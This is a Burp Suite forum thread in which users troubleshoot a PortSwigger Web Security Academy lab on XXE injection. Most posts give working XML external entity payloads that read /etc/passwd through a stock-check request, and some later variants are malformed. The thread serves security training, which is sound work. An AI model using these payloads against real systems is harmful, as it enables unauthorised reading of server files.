Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

Lab: Exploiting XXE using external entities to retrieve files

Regan | Last updated: Jun 15, 2019 03:19PM UTC

Relevant Links: https://portswigger.net/web-security/xxe https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-retrieve-files I am trying to complete this lab and I an unsure what I am doing wrong. Any help would be greatly appreciated. I have tried may variants of the syntax, but basically, the HTTP request is below: ------------------------------------------- POST /product/stock HTTP/1.1 Host: acfc205d38843c2c80fd980100af0078.web-security-academy.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:42.0) Gecko/20100101 Firefox/42.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://acfc205d38843c2c80fd980100af0078.web-security-academy.net/product?productId=13 Cookie: session=aDJvRrAxYrf804mh6rJzMmjl2195R7IN Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 168 <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <stockCheck><productId>&xxe;</productId></stockCheck> ------------------------------------------- Then I get the following response in Burp Suite: ------------------------------------------- HTTP/1.1 400 Bad Request Date: Sat, 15 Jun 2019 14:23:02 GMT Content-Type: application/json Content-Length: 86 Connection: close Content-Security-Policy: default-src 'self'; script-src 'self'; img-src 'self'; style-src 'self'; frame-src 'self'; connect-src 'self' ws://localhost:3333; font-src 'self'; media-src 'self'; object-src 'none'; child-src 'self' blob: X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block X-Frame-Options: DENY "XML parser exited with non-zero code 1: Content is not allowed in trailing section. " ------------------------------------------- Thank you.

PortSwigger Agent | Last updated: Jun 17, 2019 08:09AM UTC

I just checked this lab and the solution is working correctly for me. Please ensure Repeater is configured to automatically update Content-Length

Burp User | Last updated: Jun 19, 2019 08:19PM UTC

Am getting the same results as Regan. Content-Length seems to be related to request headers not repeater. Can somebody help?

Burp User | Last updated: Jun 20, 2019 03:09AM UTC

Use repeater instead of intruder. I used the snippet below and got the expected results! <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck>

Burp User | Last updated: Dec 05, 2019 10:22AM UTC

Is it because you are using Windows? As Windows doesn't have files name /etc/passwd

Burp User | Last updated: Feb 09, 2020 08:52AM UTC

@Daniel You are using Web application, not accessing your own system. When you access any website. For ex: Facebook or Portswigger.net then it's depend on which server Portswigger are using not what operating system you're using. You just access their services via Browser. And Ans : <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <?xml version="1.0" encoding="UTF-8"?> <stockCheck> <productId>&xxe;</productId> <storeId>1</storeId> </stockCheck> or <!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "file:///etc/passwd"> %xxe; ]> <?xml version="1.0" encoding="UTF-8"?> <stockCheck> <productId>1</productId> <storeId>1</storeId> </stockCheck>

yusuf | Last updated: May 16, 2021 12:08PM UTC

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]><stockCheck><productId>&xxe;</productId><storeId>1</storeId></stockCheck> please make sure you try this.Don't forget &xxe between productId.

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.